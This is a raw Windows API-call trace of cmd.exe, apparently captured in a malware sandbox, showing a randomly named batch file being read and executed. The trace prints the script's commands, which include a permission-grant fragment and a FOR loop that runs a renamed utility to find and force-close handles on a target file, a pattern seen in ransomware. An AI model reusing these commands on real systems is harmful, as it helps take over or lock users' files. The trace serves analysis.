GetProcessHeap () returned 0x3a0000 [0177.374] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb88) returned 0x3b6e30 [0177.374] FreeEnvironmentStringsW (penv=0x3b62a0) returned 1 [0177.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.374] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.374] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0177.375] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.375] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0177.375] SetConsoleInputExeNameW () returned 0x1 [0177.375] GetConsoleOutputCP () returned 0x1b5 [0177.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0177.375] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x31f4f4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0177.376] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0177.376] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.376] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0177.376] GetProcessHeap () returned 0x3a0000 [0177.376] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c98 | out: hHeap=0x3a0000) returned 1 [0177.376] GetProcessHeap () returned 0x3a0000 [0177.376] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c58 | out: hHeap=0x3a0000) returned 1 [0177.376] GetProcessHeap () returned 0x3a0000 [0177.376] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c18 | out: hHeap=0x3a0000) returned 1 [0177.376] GetProcessHeap () returned 0x3a0000 [0177.376] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4540 | out: hHeap=0x3a0000) returned 1 [0177.377] GetProcessHeap () returned 0x3a0000 [0177.377] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4bb8 | out: hHeap=0x3a0000) returned 1 [0177.377] GetProcessHeap () returned 0x3a0000 [0177.377] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b80 | out: hHeap=0x3a0000) returned 1 [0177.377] GetProcessHeap () returned 0x3a0000 [0177.377] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ac0 | out: hHeap=0x3a0000) returned 1 [0177.377] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.377] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0177.377] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4d8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4d8*=0xa3, lpOverlapped=0x0) returned 1 [0177.377] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0177.377] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0177.378] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.378] GetFileType (hFile=0x78) returned 0x1 [0177.378] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.378] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0177.378] GetProcessHeap () returned 0x3a0000 [0177.378] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3c43a8 [0177.378] GetProcessHeap () returned 0x3a0000 [0177.378] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x70) returned 0x3b4ac0 [0177.378] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x31ec68, lpFilePart=0x31ec60 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x31ec60*="Ch81ANBE.bat") returned 0x32 [0177.378] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3b4b38 [0177.378] FindClose (in: hFindFile=0x3b4b38 | out: hFindFile=0x3b4b38) returned 1 [0177.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3b4b38 [0177.379] FindClose (in: hFindFile=0x3b4b38 | out: hFindFile=0x3b4b38) returned 1 [0177.379] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0177.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3b4b38 [0177.379] FindClose (in: hFindFile=0x3b4b38 | out: hFindFile=0x3b4b38) returned 1 [0177.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x3b4b38 [0177.379] FindClose (in: hFindFile=0x3b4b38 | out: hFindFile=0x3b4b38) returned 1 [0177.379] GetProcessHeap () returned 0x3a0000 [0177.379] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x56) returned 0x3b4b38 [0177.379] GetProcessHeap () returned 0x3a0000 [0177.379] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0177.381] _tell (_FileHandle=3) returned 78 [0177.381] _close (_FileHandle=3) returned 0 [0177.381] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f2ac | out: _Buffer="\r\n") returned 2 [0177.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.381] GetFileType (hFile=0x7) returned 0x2 [0177.381] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f26c | out: lpMode=0x31f26c) returned 1 [0177.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.382] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f298, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f298*=0x2) returned 1 [0177.383] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0177.383] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0177.383] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f2a8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0177.384] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f2a8 | out: _Buffer=">") returned 1 [0177.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.384] GetFileType (hFile=0x7) returned 0x2 [0177.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.384] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f270 | out: lpMode=0x31f270) returned 1 [0177.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.384] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f29c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x31f29c*=0x26) returned 1 [0177.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.385] GetFileType (hFile=0x7) returned 0x2 [0177.385] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.385] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4f4 | out: lpMode=0x31f4f4) returned 1 [0177.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.386] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3b4548*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f520, lpReserved=0x0 | out: lpBuffer=0x3b4548*, lpNumberOfCharsWritten=0x31f520*=0x2) returned 1 [0177.386] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f52c | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0177.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.386] GetFileType (hFile=0x7) returned 0x2 [0177.386] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0177.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x2d) returned 1 [0177.388] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f54c | out: _Buffer="\r\n") returned 2 [0177.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.388] GetFileType (hFile=0x7) returned 0x2 [0177.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f50c | out: lpMode=0x31f50c) returned 1 [0177.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f538, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f538*=0x2) returned 1 [0177.391] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0177.391] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0177.391] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0177.391] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0177.391] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0177.391] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0177.391] GetConsoleTitleW (in: lpConsoleTitle=0x31f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.392] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x31ee78, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x31ee70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x31ee70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0177.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31ec14 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0177.394] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x31ec14, lpFilePart=0x31ec10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x31ec10*=0x0) returned 0x26 [0177.394] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0177.394] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31e990 | out: lpFindFileData=0x31e990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3b4e78 [0177.394] FindClose (in: hFindFile=0x3b4e78 | out: hFindFile=0x3b4e78) returned 1 [0177.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31e990 | out: lpFindFileData=0x31e990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3b4e78 [0177.394] FindClose (in: hFindFile=0x3b4e78 | out: hFindFile=0x3b4e78) returned 1 [0177.395] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0177.395] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31e990 | out: lpFindFileData=0x31e990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3b4e78 [0177.395] FindClose (in: hFindFile=0x3b4e78 | out: hFindFile=0x3b4e78) returned 1 [0177.395] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0177.395] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0177.395] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0177.395] GetProcessHeap () returned 0x3a0000 [0177.395] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6e30 | out: hHeap=0x3a0000) returned 1 [0177.395] GetEnvironmentStringsW () returned 0x3b62a0* [0177.395] GetProcessHeap () returned 0x3a0000 [0177.395] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb88) returned 0x3b6e30 [0177.395] FreeEnvironmentStringsW (penv=0x3b62a0) returned 1 [0177.395] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0177.395] GetProcessHeap () returned 0x3a0000 [0177.395] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4e18 | out: hHeap=0x3a0000) returned 1 [0177.395] GetProcessHeap () returned 0x3a0000 [0177.395] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4db8 | out: hHeap=0x3a0000) returned 1 [0177.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.395] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0177.396] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.396] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0177.396] SetConsoleInputExeNameW () returned 0x1 [0177.396] GetConsoleOutputCP () returned 0x1b5 [0177.396] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0177.396] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x31f4f4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0177.397] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0177.397] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.397] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0177.397] GetProcessHeap () returned 0x3a0000 [0177.397] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4d48 | out: hHeap=0x3a0000) returned 1 [0177.397] GetProcessHeap () returned 0x3a0000 [0177.397] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4cd8 | out: hHeap=0x3a0000) returned 1 [0177.398] GetProcessHeap () returned 0x3a0000 [0177.398] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c68 | out: hHeap=0x3a0000) returned 1 [0177.398] GetProcessHeap () returned 0x3a0000 [0177.398] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4bf8 | out: hHeap=0x3a0000) returned 1 [0177.398] GetProcessHeap () returned 0x3a0000 [0177.398] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4540 | out: hHeap=0x3a0000) returned 1 [0177.398] GetProcessHeap () returned 0x3a0000 [0177.398] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b98 | out: hHeap=0x3a0000) returned 1 [0177.398] GetProcessHeap () returned 0x3a0000 [0177.398] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b38 | out: hHeap=0x3a0000) returned 1 [0177.398] GetProcessHeap () returned 0x3a0000 [0177.398] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ac0 | out: hHeap=0x3a0000) returned 1 [0177.398] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.398] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0177.398] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4d8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4d8*=0x94, lpOverlapped=0x0) returned 1 [0177.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0177.398] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.398] GetFileType (hFile=0x78) returned 0x1 [0177.398] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.398] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0177.399] GetProcessHeap () returned 0x3a0000 [0177.399] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3c43a8 [0177.399] GetProcessHeap () returned 0x3a0000 [0177.399] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4008) returned 0x3c83c0 [0177.400] GetProcessHeap () returned 0x3a0000 [0177.400] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xe) returned 0x3b4540 [0177.400] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"Workflow.Targets\"") returned 0x12 [0177.400] GetProcessHeap () returned 0x3a0000 [0177.400] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4540 | out: hHeap=0x3a0000) returned 1 [0177.400] GetProcessHeap () returned 0x3a0000 [0177.400] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c83c0 | out: hHeap=0x3a0000) returned 1 [0177.400] GetProcessHeap () returned 0x3a0000 [0177.400] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0177.406] _tell (_FileHandle=3) returned 226 [0177.407] _close (_FileHandle=3) returned 0 [0177.407] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f2ac | out: _Buffer="\r\n") returned 2 [0177.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.407] GetFileType (hFile=0x7) returned 0x2 [0178.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.438] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f26c | out: lpMode=0x31f26c) returned 1 [0178.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.443] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f298, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f298*=0x2) returned 1 [0178.452] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0178.452] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0178.454] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f2a8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0178.454] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f2a8 | out: _Buffer=">") returned 1 [0178.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.454] GetFileType (hFile=0x7) returned 0x2 [0178.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.478] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f270 | out: lpMode=0x31f270) returned 1 [0178.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.488] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f29c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x31f29c*=0x26) returned 1 [0178.517] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x31f52c | out: _Buffer="FOR") returned 3 [0178.517] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.517] GetFileType (hFile=0x7) returned 0x2 [0178.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.520] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0178.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.521] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x3) returned 1 [0178.556] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x31f52c | out: _Buffer=" /F") returned 3 [0178.556] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.556] GetFileType (hFile=0x7) returned 0x2 [0178.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0178.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.557] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x3) returned 1 [0178.558] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x31f52c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0178.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.558] GetFileType (hFile=0x7) returned 0x2 [0178.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0178.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.558] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, 